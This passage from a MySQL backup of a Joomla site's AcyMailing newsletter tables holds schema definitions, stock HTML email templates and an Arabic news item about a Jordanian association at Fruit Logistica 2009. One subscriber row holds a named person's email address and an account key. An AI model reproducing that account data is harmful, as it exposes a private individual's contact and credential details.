#cccccc;\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">مشاركة الجمعية في معرض Fruit Logistica 2009</h2>\r\n<p dir=\"RTL\" style=\"text-align: right;\"><b>شارك اعضاء من الجمعية بتمويل من كل من مركز تطوير الأعمال والصادرات للشركات الأردنية ( تطوير) والممول من الوكالة الأمريكية للإنماء الدولي</b><b> والمؤسسة الأردنية لتطوير المشاريع الاقتصادية والمركز السويسري لترويج الصادرات </b><b> Sippo</b><b>في \"معرض </b><b>Fruit Logistic 2009</b><b>\" الذي أقيم في العاصمة الألمانية برلين خلال الفترة 4-6 شباط 2009.</b><b>.و</b><b>كان الهدف من المشاركة في هذا المعرض اطلاع المستوردين على جودة الخضار والفواكه الأردنية، وذلك لفتح أسواق جديدة لمنتجاتنا الزراعية، وقد كانت المشاركة مميزة من حيث ترتيب الجناح وعدد الزوار وحضور عدد من المستوردين اللذين أبدوا اهتماماً بالغاً بالمنتجات الأردنية عالية الجودة.</b><b>.</b></p>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 1.2.3.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',1,NULL,1322988205,'','','','','news',1,62,'jepas-newsletter-3-2009',NULL,1,4,'500ee185c2986da8165471186b2a2bfe',NULL,NULL,NULL,'',''); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_mail` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_queue` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_queue`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_queue` ( `senddate` int(10) unsigned NOT NULL default '0', `subid` int(10) unsigned NOT NULL default '0', `mailid` mediumint(10) unsigned NOT NULL default '0', `priority` tinyint(3) unsigned default '3', `try` tinyint(3) unsigned NOT NULL default '0', PRIMARY KEY (`subid`,`mailid`), KEY `senddate` (`senddate`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_queue` -- LOCK TABLES `bak_fit_bss_acymailing_queue` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_queue` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_queue` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_rules` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_rules`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_rules` ( `ruleid` smallint(5) unsigned NOT NULL auto_increment, `name` varchar(250) NOT NULL default '', `ordering` smallint(6) default NULL, `regex` varchar(250) NOT NULL default '', `executed_on` text NOT NULL, `action_message` text NOT NULL, `action_user` text NOT NULL, `published` tinyint(3) unsigned NOT NULL default '0', PRIMARY KEY (`ruleid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_rules` -- LOCK TABLES `bak_fit_bss_acymailing_rules` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_rules` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_rules` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_stats` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_stats`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_stats` ( `mailid` mediumint(10) unsigned NOT NULL default '0', `senthtml` int(10) unsigned NOT NULL default '0', `senttext` int(10) unsigned NOT NULL default '0', `senddate` int(10) unsigned NOT NULL default '0', `openunique` mediumint(10) unsigned NOT NULL default '0', `opentotal` int(10) unsigned NOT NULL default '0', `bounceunique` mediumint(10) unsigned NOT NULL default '0', `fail` mediumint(10) unsigned NOT NULL default '0', `clicktotal` int(10) unsigned NOT NULL default '0', `clickunique` mediumint(10) unsigned NOT NULL default '0', `unsub` mediumint(10) unsigned NOT NULL default '0', `forward` mediumint(10) unsigned NOT NULL default '0', PRIMARY KEY (`mailid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_stats` -- LOCK TABLES `bak_fit_bss_acymailing_stats` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_stats` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_stats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_subscriber` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_subscriber`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_subscriber` ( `subid` int(10) unsigned NOT NULL auto_increment, `email` varchar(200) NOT NULL default '', `userid` int(10) unsigned default NULL, `name` varchar(250) NOT NULL default '', `created` int(10) unsigned default NULL, `confirmed` tinyint(4) NOT NULL default '0', `enabled` tinyint(4) NOT NULL default '1', `accept` tinyint(4) NOT NULL default '1', `ip` varchar(100) default NULL, `html` tinyint(4) NOT NULL default '1', `key` varchar(250) default NULL, PRIMARY KEY (`subid`), UNIQUE KEY `email` (`email`), KEY `userid` (`userid`) ) ENGINE=MyISAM AUTO_INCREMENT=37 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_subscriber` -- LOCK TABLES `bak_fit_bss_acymailing_subscriber` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_subscriber` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_subscriber` VALUES (1,'ahmed.abulebdeh@builders-solutions.com',62,'Adminbss',1289230152,1,1,1,NULL,1,'83a92bc7728a31903b6bf7a49c5310b7'); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_subscriber` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_template` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_template`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_template` ( `tempid` smallint(11) unsigned NOT NULL auto_increment, `name` varchar(250) default NULL, `description` text, `body` longtext, `altbody` longtext, `created` int(10) unsigned default NULL, `published` tinyint(4) NOT NULL default '1', `premium` tinyint(4) NOT NULL default '0', `ordering` smallint(10) unsigned NOT NULL default '99', `namekey` varchar(50) NOT NULL default '', `styles` text, `subject` varchar(250) default NULL, `stylesheet` text, `fromname` varchar(250) default NULL, `fromemail` varchar(250) default NULL, `replyname` varchar(250) default NULL, `replyemail` varchar(250) default NULL, PRIMARY KEY (`tempid`), UNIQUE KEY `namekey` (`namekey`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_template` -- LOCK TABLES `bak_fit_bss_acymailing_template` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_template` DISABLE KEYS */; INSERT INTO `bak_fit_bss_acymailing_template` VALUES (1,'White Shadow Red','<img src=\"media/com_acymailing/templates/newsletter-1/newsletter-1.png\" />','<div style=\"background-color: #e2e8df; width: 100%; color: #8a8a8a; text-align: center;\">\r\n <table style=\"text-align: left; margin: auto;\" align=\"center\" width=\"560\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td class=\"hideonline\" style=\"padding: 20px 0px; font-size: 10px; color: #000000; margin: auto; text-align: center;\" colspan=\"3\">This email contains graphics, so if you don\'t see them, {readonline}view it in your browser{/readonline}.</td>\r\n </tr>\r\n <tr>\r\n <td width=\"37\"> </td>\r\n <td style=\"background-color: #fbfbf7;\" valign=\"top\" width=\"496\">\r\n <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td colspan=\"2\" height=\"20\"> </td>\r\n </tr>\r\n <tr>\r\n <td width=\"20\"> </td>\r\n <td style=\"background-color: #f9f7d3;\" width=\"456\" height=\"110\">\r\n <table width=\"456\" cellspacing=\"0\" cellpadding=\"0\">\r\n <tr>\r\n <td colspan=\"3\" height=\"11\"> </td>\r\n </tr>\r\n <tr>\r\n <td width=\"7\"> </td>\r\n <td style=\"line-height: 0px;\"><img src=\"http://www.acyba.com/images/templates/newsletter-1/logo-icon.png\" border=\"0\" alt=\"\" /></td>\r\n <td valign=\"top\">\r\n <h1>AcyMailing is Out!</h1>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td colspan=\"3\" height=\"3\"> </td>\r\n </tr>\r\n </table>\r\n </td>\r\n <td width=\"20\"> </td>\r\n </tr>\r\n <tr>\r\n <td colspan=\"5\">\r\n <table width=\"100%\">\r\n <tr>\r\n <td width=\"40\"> </td>\r\n <td>\r\n <div class=\"acymailing_content\">\r\n <h2>E-Mail</h2>\r\n <p style=\"text-align: justify;\"><img src=\"http://www.acyba.com/images/templates/newsletter-1/acymailing.png\" border=\"0\" alt=\"\" style=\"margin: 10px; float: right;\" /> Electronic mail, often abbreviated as email or e-mail, is a method of exchanging digital messages, designed primarily for human use. E-mail systems are based on a store-and-forward model in which e-mail computer server systems accept, forward, deliver and store messages on behalf of users, who only need to connect to the e-mail infrastructure, typically an e-mail server, with a network-enabled device (e.g., a personal computer) for the duration of message submission or retrieval.<br /><a href=\"http://en.wikipedia.org/wiki/E-mail\">Wikipedia</a></p>\r\n </div>\r\n <div class=\"acymailing_content\">\r\n <h2>Marketing Campaign</h2>\r\n <p><img src=\"http://www.acyba.com/images/templates/newsletter-1/essential.png\" border=\"0\" alt=\"\" style=\"float: left; margin: 10px;\" />Marketing is an integrated communications-based process through which individuals and communities are informed or persuaded that existing and newly-identified needs and wants may be satisfied by the products and services of others.</p>\r\n <p>Marketing is used to create the customer, to keep the customer and to satisfy the customer. <a href=\"http://en.wikipedia.org/wiki/Marketing_campaign\">Wikipedia</a></p>\r\n </div>\r\n <div class=\"acymailing_content\">\r\n <h2>Joomla!</h2>\r\n <p>Joomla! is a content management system platform for publishing content on the World Wide Web and intranets as well as a Model–view–controller (MVC) Web Application Development framework.</p>\r\n <p>The system includes features such as page caching to improve performance, RSS feeds, printable versions of pages, news flashes, blogs, polls, website searching, and language internationalization.<br /><a href=\"http://en.wikipedia.org/wiki/Joomla\">Wikipedia</a></p>\r\n </div>\r\n </td>\r\n <td width=\"40\"> </td>\r\n </tr>\r\n </table>\r\n </td>\r\n </tr>\r\n </table>\r\n </td>\r\n <td width=\"27\"> </td>\r\n </tr>\r\n <tr style=\"line-height: 0px;\">\r\n <td style=\"line-height: 0px;\" colspan=\"3\"><img src=\"media/com_acymailing/templates/newsletter-1/page-footer.png\" border=\"0\" alt=\"\" /></td>\r\n </tr>\r\n <tr>\r\n <td style=\"padding: 20px 0px; font-size: 10px; color: #000000; margin: auto; text-align: center;\" colspan=\"3\">Not interested any more? {unsubscribe}Unsubscribe{/unsubscribe}</td>\r\n </tr>\r\n </table>\r\n</div>','',NULL,1,0,1,'newsletter-1','a:9:{s:18:\"acymailing_content\";s:129:\"clear:both;text-align:justify;font-family: Verdana, Arial, Helvetica, sans-serif;font-size:12px;line-height:14px;margin-top:10px;\";s:16:\"acymailing_title\";s:89:\"color:#8a8a8a;font-weight:normal;font-size:14px;margin:0;border-bottom:5px solid #d39f9f;\";s:16:\"acymailing_unsub\";s:31:\"font-weight:bold;color:#000000;\";s:19:\"acymailing_readmore\";s:14:\"color:#d39f9f;\";s:17:\"acymailing_online\";s:31:\"font-weight:bold;color:#000000;\";s:6:\"tag_h1\";s:128:\"margin-bottom:0;margin-top:0;font-family: Verdana, Arial, Helvetica, sans-serif;font-size:26px;color:#d47e7e;vertical-align:top;\";s:6:\"tag_h2\";s:100:\"color:#8a8a8a !important;font-weight:normal;font-size:14px;margin:0;border-bottom:5px solid #d39f9f;\";s:6:\"tag_h3\";s:68:\"color:#8a8a8a !important;font-weight:normal;font-size:100%;margin:0;\";s:8:\"color_bg\";s:7:\"#e2e8df\";}',NULL,'div,table{font-family: Verdana, Arial, Helvetica, sans-serif; font-size:12px;}',NULL,NULL,NULL,NULL),(2,'Clean White Pink','<img src=\"media/com_acymailing/templates/newsletter-2/newsletter-2.png\" />','<div style=\"background-color: #ffffff; width: 100%; color: #8a8a8a; text-align: center;\">\r\n<table style=\"text-align: left; margin: auto;\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td class=\"hideonline\" style=\"padding: 20px 0px; font-size: 10px; color: #000000; margin: auto; text-align: center;\" colspan=\"3\">This email contains graphics, so if you don\'t see them, {readonline}view it in your browser{/readonline}.</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"370\">\r\n<h1>AcyMailing is Out!</h1>\r\n<br />\r\n<div class=\"acymailing_content\">\r\n<h2>E-Mail</h2>\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><img src=\"http://www.acyba.com/images/templates/newsletter-1/acymailing.png\" border=\"0\" alt=\"\" style=\"float: left;\" />Electronic mail, often abbreviated as email or e-mail, is a method of exchanging digital messages, designed primarily for human use.<br /><a href=\"http://en.wikipedia.org/wiki/E-mail\">Wikipedia</a></p>\r\n<a href=\"#\" style=\"font-size: 10px; color: #999999;\">Read More</a></div>\r\n<div class=\"acymailing_content\">\r\n<h2>Marketing Campaign</h2>\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><img src=\"http://www.acyba.com/images/templates/newsletter-1/essential.png\" border=\"0\" alt=\"\" style=\"float: left;\" />Marketing is an integrated communications-based process through which individuals and communities are informed or persuaded that existing and newly-identified needs and wants may be satisfied by the products and services of others.</p>\r\n<p style=\"font-size: 10px; margin-top: 0px;\">Marketing is used to create the customer, to keep the customer and to satisfy the customer. <a href=\"http://en.wikipedia.org/wiki/Marketing_campaign\">Wikipedia</a></p>\r\n<a href=\"#\" style=\"font-size: 10px; color: #999999;\">Read More</a></div>\r\n</td>\r\n<td width=\"20\"> </td>\r\n<td valign=\"top\" width=\"210\"><img src=\"http://www.acyba.com/images/templates/newsletter-2/logo-icon.jpg\" border=\"0\" alt=\"\" width=\"207\" height=\"137\" />\r\n<div class=\"acymailing_content\">\r\n<h2>Joomla!</h2>\r\n<p style=\"font-size: 10px; margin-top: 0px;\">Joomla! is a content management system platform for publishing content on the World Wide Web and intranets as well as a Model–view–controller (MVC) Web Application Development framework.</p>\r\n<img src=\"media/com_acymailing/templates/newsletter-2/hori-separator.png\" border=\"0\" alt=\"\" />\r\n<p style=\"font-size: 10px; margin-top: 0px;\">The system includes features such as page caching to improve performance, RSS feeds, printable versions of pages, news flashes, blogs, polls, website searching, and language internationalization.<br /><a href=\"http://en.wikipedia.org/wiki/Joomla\">Wikipedia</a></p>\r\n<a href=\"#\" style=\"font-size: 10px; color: #999999;\">Read More</a></div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 20px 0px; font-size: 10px; color: #000000;\" colspan=\"3\">Not interested any more? {unsubscribe}Unsubscribe{/unsubscribe}</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>','',NULL,1,0,2,'newsletter-2','a:8:{s:18:\"acymailing_content\";s:63:\"clear:both;text-align:justify;line-height:14px;margin-top:10px;\";s:16:\"acymailing_title\";s:94:\"color:#8a8a8a;text-align:right;border-bottom:6px solid #d39fc9;font-size:16px;margin-top:10px;\";s:19:\"acymailing_readmore\";s:32:\"font-size: 10px; color: #999999;\";s:6:\"tag_h1\";s:144:\"margin-bottom:0;margin-top:0;font-family:Verdana, Arial, Helvetica, sans-serif;font-size:26px;color:#d47e7e;vertical-align:top;text-align:center\";s:8:\"color_bg\";s:7:\"#ffffff\";s:6:\"tag_h2\";s:105:\"color:#8a8a8a !important;text-align:right;border-bottom:6px solid #d39fc9;font-size:16px;margin-top:10px;\";s:6:\"tag_h3\";s:85:\"color:#8a8a8a !important;text-align:right;font-weight:normal;font-size:100%;margin:0;\";s:5:\"tag_a\";s:39:\"color:#d39fc9;text-decoration:underline\";}',NULL,'div,table{font-family: Verdana, Arial, Helvetica, sans-serif; font-size:12px;}',NULL,NULL,NULL,NULL),(3,'Rounders and corners','<img src=\"media/com_acymailing/templates/newsletter-3/newsletter-3.png\" />','<div style=\"background-color: #dfe6e8; width: 100%; font-family: Verdana, Arial, Helvetica, sans-serif; color: #8a8a8a; text-align: center;\">\r\n<table style=\"text-align: left; margin: auto;\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td class=\"hideonline\" style=\"font-size: 10px; color: #000000; margin: auto; text-align: center; padding: 20px 0px;\" colspan=\"3\">This email contains graphics, so if you don\'t see them, {readonline}view it in your browser{/readonline}.</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"216\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"line-height: 0px;\">\r\n<td style=\"text-align: center;\"><img src=\"http://www.acyba.com/images/templates/newsletter-3/logo-icon.jpg\" border=\"0\" alt=\"\" width=\"207\" height=\"137\" /></td>\r\n</tr>\r\n<tr>\r\n<td height=\"20\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"line-height: 0;\">\r\n<td style=\"line-height: 0px;\" colspan=\"3\" width=\"216\" height=\"15\"><img src=\"media/com_acymailing/templates/newsletter-3/top23rds.png\" border=\"0\" alt=\"\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"background-color: #ffffff;\" width=\"15\"> </td>\r\n<td style=\"background-color: #ffffff;\" width=\"186\">\r\n<div class=\"acymailing_content\">\r\n<h2>Joomla!</h2>\r\n<p style=\"font-size: 10px; margin-top: 0px;\">Joomla! is a content management system platform for publishing content on the World Wide Web and intranets as well as a Model–view–controller (MVC) Web Application Development framework.</p>\r\n<img src=\"media/com_acymailing/templates/newsletter-2/hori-separator.png\" border=\"0\" alt=\"\" />\r\n<p style=\"font-size: 10px;\">The system includes features such as page caching to improve performance, RSS feeds, printable versions of pages, news flashes, blogs, polls, website searching, and language internationalization.<br /><a href=\"http://en.wikipedia.org/wiki/Joomla\">Wikipedia</a></p>\r\n<a href=\"#\" style=\"font-size: 10px; color: #999999;\">Read More</a></div>\r\n</td>\r\n<td style=\"background-color: #ffffff;\" width=\"15\"> </td>\r\n</tr>\r\n<tr style=\"line-height: 0;\">\r\n<td style=\"line-height: 0px;\" colspan=\"3\" width=\"216\" height=\"15\"><img src=\"media/com_acymailing/templates/newsletter-3/bottom23rds.png\" border=\"0\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td width=\"20\"> </td>\r\n<td valign=\"top\" width=\"364\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"background-color: #ffffff; color: #d47e7e; text-align: center;\" width=\"325\" height=\"48\">\r\n<h1>AcyMailing is Out!</h1>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td height=\"20\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"line-height: 0;\">\r\n<td style=\"line-height: 0px;\" colspan=\"3\" width=\"323\" height=\"15\"><img src=\"media/com_acymailing/templates/newsletter-3/top23rd.png\" border=\"0\" alt=\"\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"background-color: #ffffff;\" width=\"15\"> </td>\r\n<td style=\"background-color: #ffffff;\" width=\"293\">\r\n<div class=\"acymailing_content\">\r\n<h2>E-Mail</h2>\r\n<p><img src=\"http://www.acyba.com/images/templates/newsletter-1/acymailing.png\" border=\"0\" alt=\"\" style=\"float: left;\" />Electronic mail, often abbreviated as email or e-mail, is a method of exchanging digital messages, designed primarily for human use.<br /><a href=\"http://en.wikipedia.org/wiki/E-mail\">Wikipedia</a></p>\r\n<a href=\"#\" style=\"font-size: 10px; color: #999999;\">Read More</a></div>\r\n</td>\r\n<td style=\"background-color: #ffffff;\" width=\"15\"> </td>\r\n</tr>\r\n<tr style=\"line-height: 0;\">\r\n<td style=\"line-height: 0px;\" colspan=\"3\" width=\"323\" height=\"15\"><img src=\"media/com_acymailing/templates/newsletter-3/bottom23rd.png\" border=\"0\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td height=\"20\"> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"line-height: 0;\">\r\n<td style=\"line-height: 0px;\" colspan=\"3\" width=\"323\" height=\"15\"><img src=\"media/com_acymailing/templates/newsletter-3/top23rd.png\" border=\"0\" alt=\"\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"background-color: #ffffff;\" width=\"15\"> </td>\r\n<td style=\"background-color: #ffffff;\" width=\"293\">\r\n<div class=\"acymailing_content\">\r\n<h2>Marketing Campaign</h2>\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><img src=\"http://www.acyba.com/images/templates/newsletter-1/essential.png\" border=\"0\" alt=\"\" style=\"float: right;\" />Marketing is an integrated communications-based process through which individuals and communities are informed or persuaded that existing and newly-identified needs and wants may be satisfied by the products and services of others.</p>\r\n<img src=\"media/com_acymailing/templates/newsletter-2/hori-separator.png\" border=\"0\" alt=\"\" />\r\n<p style=\"font-size: 10px;\">Marketing is used to create the customer, to keep the customer and to satisfy the customer. <a href=\"http://en.wikipedia.org/wiki/Marketing_campaign\">Wikipedia</a></p>\r\n<a href=\"#\" style=\"font-size: 10px; color: #999999;\">Read More</a></div>\r\n</td>\r\n<td style=\"background-color: #ffffff;\" width=\"15\"> </td>\r\n</tr>\r\n<tr style=\"line-height: 0;\">\r\n<td style=\"line-height: 0px;\" colspan=\"3\" width=\"323\" height=\"15\"><img src=\"media/com_acymailing/templates/newsletter-3/bottom23rd.png\" border=\"0\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 0px; font-size: 10px; color: #000000; margin: auto; text-align: center;\" colspan=\"3\">Not interested any more? {unsubscribe}Unsubscribe{/unsubscribe}</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>','',NULL,1,0,3,'newsletter-3','a:7:{s:6:\"tag_h1\";s:127:\"margin-bottom:0;margin-top:0;font-family:Verdana, Arial, Helvetica, sans-serif;font-size:26px;color:#d47e7e;vertical-align:top;\";s:6:\"tag_h2\";s:72:\"color:#8a8a8a !important;border-bottom:6px solid #d3d09f;font-size:16px;\";s:16:\"acymailing_title\";s:72:\"color:#8a8a8a !important;border-bottom:6px solid #d3d09f;font-size:16px;\";s:6:\"tag_h3\";s:68:\"color:#8a8a8a !important;font-weight:normal;font-size:100%;margin:0;\";s:19:\"acymailing_readmore\";s:32:\"font-size: 10px; color: #999999;\";s:8:\"color_bg\";s:7:\"#dfe6e8\";s:18:\"acymailing_content\";s:19:\"text-align:justify;\";}',NULL,'div,table{font-family: Verdana, Arial, Helvetica, sans-serif; font-size:12px;}',NULL,NULL,NULL,NULL),(4,'jepa temp','','<center> \r\n<table style=\"background: #ffffff; border: 1px solid #cccccc;\" width=\"95%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"15\"></td>\r\n<td>\r\n<div class=\"acymailing_content\">\r\n<h2 style=\"border-bottom: 6px solid #d3d09f; font-size: 16px; text-align: right;\">مشاركة الجمعية في معرض Fruit Logistica 2009</h2>\r\n<p style=\"text-align: right;\" dir=\"RTL\"><b>شارك اعضاء من الجمعية بتمويل من كل من مركز تطوير الأعمال والصادرات للشركات الأردنية ( تطوير) والممول من الوكالة الأمريكية للإنماء الدولي</b><b> والمؤسسة الأردنية لتطوير المشاريع الاقتصادية والمركز السويسري لترويج الصادرات </b><b> Sippo</b><b>في \"معرض </b><b>Fruit Logistic 2009</b><b>\" الذي أقيم في العاصمة الألمانية برلين خلال الفترة 4-6 شباط 2009.</b><b>.و</b><b>كان الهدف من المشاركة في هذا المعرض اطلاع المستوردين على جودة الخضار والفواكه الأردنية، وذلك لفتح أسواق جديدة لمنتجاتنا الزراعية، وقد كانت المشاركة مميزة من حيث ترتيب الجناح وعدد الزوار وحضور عدد من المستوردين اللذين أبدوا اهتماماً بالغاً بالمنتجات الأردنية عالية الجودة.</b><b>.</b></p>\r\n<br />\r\n<p style=\"font-size: 10px; margin-top: 0px;\"><a href=\"images/doc/news letter 1.2.3.doc\">إقرأ المزيد</a></p>\r\n</div>\r\n</td>\r\n<td width=\"15\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center>','',NULL,1,1,4,'1322667564jepa-temp','a:0:{}','','','','','',''); /*!40000 ALTER TABLE `bak_fit_bss_acymailing_template` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_url` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_url`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_url` ( `urlid` int(10) unsigned NOT NULL auto_increment, `name` varchar(250) NOT NULL default '', `url` text NOT NULL, PRIMARY KEY (`urlid`), KEY `url` (`url`(250)) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_url` -- LOCK TABLES `bak_fit_bss_acymailing_url` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_url` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_url` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_urlclick` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_urlclick`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_urlclick` ( `urlid` int(10) unsigned NOT NULL default '0', `mailid` mediumint(10) unsigned NOT NULL default '0', `click` smallint(10) unsigned NOT NULL default '0', `subid` int(10) unsigned NOT NULL default '0', `date` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`urlid`,`mailid`,`subid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_urlclick` -- LOCK TABLES `bak_fit_bss_acymailing_urlclick` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_urlclick` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_urlclick` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_acymailing_userstats` -- DROP TABLE IF EXISTS `bak_fit_bss_acymailing_userstats`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_acymailing_userstats` ( `mailid` mediumint(10) unsigned NOT NULL default '0', `subid` int(10) unsigned NOT NULL default '0', `html` tinyint(3) unsigned NOT NULL default '1', `sent` tinyint(4) NOT NULL default '1', `senddate` int(11) NOT NULL default '0', `open` tinyint(4) NOT NULL default '0', `opendate` int(11) NOT NULL default '0', `bounce` tinyint(4) NOT NULL default '0', `fail` tinyint(4) NOT NULL default '0', PRIMARY KEY (`mailid`,`subid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_acymailing_userstats` -- LOCK TABLES `bak_fit_bss_acymailing_userstats` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_userstats` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_acymailing_userstats` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_banner` -- DROP TABLE IF EXISTS `bak_fit_bss_banner`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_banner` ( `bid` int(11) NOT NULL auto_increment, `cid` int(11) NOT NULL default '0', `type` varchar(30) NOT NULL default 'banner', `name` varchar(255) NOT NULL default '', `alias` varchar(255) NOT NULL default '', `imptotal` int(11) NOT NULL default '0', `impmade` int(11) NOT NULL default '0', `clicks` int(11) NOT NULL default '0', `imageurl` varchar(100) NOT NULL default '', `clickurl` varchar(200) NOT NULL default '', `date` datetime default NULL, `showBanner` tinyint(1) NOT NULL default '0', `checked_out` tinyint(1) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) default NULL, `custombannercode` text, `catid` int(10) unsigned NOT NULL default '0', `description` text NOT NULL, `sticky` tinyint(1) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', `tags` text NOT NULL, `params` text NOT NULL, PRIMARY KEY (`bid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table 